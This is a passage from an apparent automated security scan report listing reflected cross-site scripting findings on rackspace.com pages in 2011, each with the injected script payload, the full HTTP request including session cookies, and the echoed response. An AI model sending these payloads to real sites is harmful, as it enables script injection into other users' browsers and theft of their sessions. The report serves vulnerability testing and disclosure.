               onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/forms/contactsales.php?7a26f"><script>alert(1)</script>18575b301b2=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a4242353bda923acdd2','custclient','width=500,height=320');return fal
...[SNIP]...

4.130. http://www.rackspace.com/forms/contactsalesconfirmation.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rackspace.com
Path:   /forms/contactsalesconfirmation.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c581"><script>alert(1)</script>4a0f4d57d54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forms/contactsalesconfirmation.php?6c581"><script>alert(1)</script>4a0f4d57d54=1 HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.3.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=5; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:52:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: US4da9da571af9d6d58e6c524219e4d7f8_pagecount=6; expires=Sat, 05-Feb-2011 16:52:56 GMT; path=/; domain=.rackspace.com
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 34038


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol
...[SNIP]...
ick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/forms/contactsalesconfirmation.php?6c581"><script>alert(1)</script>4a0f4d57d54=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42a8503e776f91e0e5','custclient','width=500,height=320');return false;">
...[SNIP]...

4.131. http://www.rackspace.com/forms/logorequest.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rackspace.com
Path:   /forms/logorequest.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17cbb"><script>alert(1)</script>68b9e00999b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forms/logorequest.php?17cbb"><script>alert(1)</script>68b9e00999b=1 HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.3.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=5; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:52:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: US4da9da571af9d6d58e6c524219e4d7f8_pagecount=6; expires=Sat, 05-Feb-2011 16:52:59 GMT; path=/; domain=.rackspace.com
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 36972


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol
...[SNIP]...
rap"
               onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/forms/logorequest.php?17cbb"><script>alert(1)</script>68b9e00999b=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42a8503e776f91e0e5','custclient','width=500,height=320');return false;">
...[SNIP]...

4.132. http://www.rackspace.com/forms/solutionpartnerapplication.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rackspace.com
Path:   /forms/solutionpartnerapplication.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61bbb"><script>alert(1)</script>18701c3bf88 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forms/solutionpartnerapplication.php?61bbb"><script>alert(1)</script>18701c3bf88=1 HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:30:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: keyword=cleanentry; expires=Sat, 05-Feb-2011 16:30:20 GMT; path=/; domain=.rackspace.com
Set-Cookie: US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; expires=Sat, 05-Feb-2011 16:30:20 GMT; path=/; domain=.rackspace.com
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 75052


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol
...[SNIP]...
k="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/forms/solutionpartnerapplication.php?61bbb"><script>alert(1)</script>18701c3bf88=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42a8503e776f91e0e5','custclient','width=500,height=320');return false;">
...[SNIP]...

4.133. http://www.rackspace.com/hosting_knowledge/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rackspace.com
Path:   /hosting_knowledge/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab12f"><script>alert(1)</script>c842bac33c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ab12f\"><script>alert(1)</script>c842bac33c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hosting_knowledge/?ab12f"><script>alert(1)</script>c842bac33c5=1 HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:48:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
X-Pingback: http://www.rackspace.com/hosting_knowledge/xmlrpc.php
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: US4da9da571af9d6d58e6c524219e4d7f8_pagecount=3; expires=Sat, 05-Feb-2011 16:48:51 GMT; path=/; domain=.rackspace.com
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 149005


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol
...[SNIP]...
e-wrap"
               onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/hosting_knowledge/?ab12f\"><script>alert(1)</script>c842bac33c5=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a42a9db35b45dd84769','custclient','width=500,height=320');return fal
...[SNIP]...

4.134. http://www.rackspace.com/hosting_knowledge/index.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rackspace.com
Path:   /hosting_knowledge/index.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43306"><script>alert(1)</script>9a196529920 was submitted in the REST URL parameter 2. This input was echoed as 43306\"><script>alert(1)</script>9a196529920 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hosting_knowledge/index.php43306"><script>alert(1)</script>9a196529920 HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.3.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=5; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 16:00:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
X-Pingback: http://www.rackspace.com/hosting_knowledge/xmlrpc.php
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 05 Feb 2011 16:00:07 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: US4da9da571af9d6d58e6c524219e4d7f8_pagecount=6; expires=Sat, 05-Feb-2011 17:00:07 GMT; path=/; domain=.rackspace.com
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 148266


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol
...[SNIP]...
               onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/hosting_knowledge/index.php43306\"><script>alert(1)</script>9a196529920&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a42a9db35b45dd84769','custclient','width=500,height=320');return false
...[SNIP]...

4.135. http://www.rackspace.com/hosting_solutions.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rackspace.com
Path:   /hosting_solutions.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 778f4"><script>alert(1)</script>b266e48b218 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hosting_solutions.php?778f4"><script>alert(1)</script>b266e48b218=1 HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:29:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: keyword=cleanentry; expires=Sat, 05-Feb-2011 16:29:52 GMT; path=/; domain=.rackspace.com
Set-Cookie: US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; expires=Sat, 05-Feb-2011 16:29:52 GMT; path=/; domain=.rackspace.com
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 45891


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol
...[SNIP]...
rap"
               onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/hosting_solutions.php?778f4"><script>alert(1)</script>b266e48b218=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a4242353bda923acdd2','custclient','width=500,height=320');return fal
...[SNIP]...

4.136. http://www.rackspace.com/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rackspace.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2667a"><script>alert(1)</script>060931ff4d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?2667a"><script>alert(1)</script>060931ff4d2=1 HTTP/1.1
Host: www.rackspace.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:18:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=bb524b41262382f21fc073a0798e47d6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lpUASrackuid=USbb524b41262382f21fc073a0798e47d6; expires=Thu, 04-Aug-2011 15:18:34 GMT; path=/; domain=.rackspace.com
Set-Cookie: IS_UASrackuid=USbb524b41262382f21fc073a0798e47d6; expires=Thu, 04-Aug-2011 15:18:34 GMT; path=/; domain=.rackspace.com
Set-Cookie: USbb524b41262382f21fc073a0798e47d6_pagecount=1; expires=Sat, 05-Feb-2011 16:18:34 GMT; path=/; domain=.rackspace.com
Set-Cookie: livechat=instantservice; expires=Sun, 06-Feb-2011 15:18:34 GMT; path=/; domain=.rackspace.com
Set-Cookie: chatslider=D; expires=Sun, 06-Feb-2011 15:18:34 GMT; path=/; domain=.rackspace.com
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 33178


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol
...[SNIP]...
chatinvite-wrap"
               onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/index.php?2667a"><script>alert(1)</script>060931ff4d2=1&optionaldata3=cleanEntry&optionaldata4=USbb524b41262382f21fc073a0798e47d6&optionaldata5=','custclient','width=500,height=320');return false;">
...[SNIP]...

4.137. http://www.rackspace.com/index.php [noflash parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rackspace.com
Path:   /index.php

Issue detail

The value of the noflash request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93307"><script>alert(1)</script>52822b1d737 was submitted in the noflash parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?noflash=true93307"><script>alert(1)</script>52822b1d737 HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:27:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: keyword=cleanentry; expires=Sat, 05-Feb-2011 16:27:04 GMT; path=/; domain=.rackspace.com
Set-Cookie: US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; expires=Sat, 05-Feb-2011 16:27:04 GMT; path=/; domain=.rackspace.com
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 33263


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol
...[SNIP]...
rap"
               onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/index.php?noflash=true93307"><script>alert(1)</script>52822b1d737&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a425300ec182657b7e0','custclient','width=500,height=320');return false
...[SNIP]...

4.138. http://www.rackspace.com/information/aboutus.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
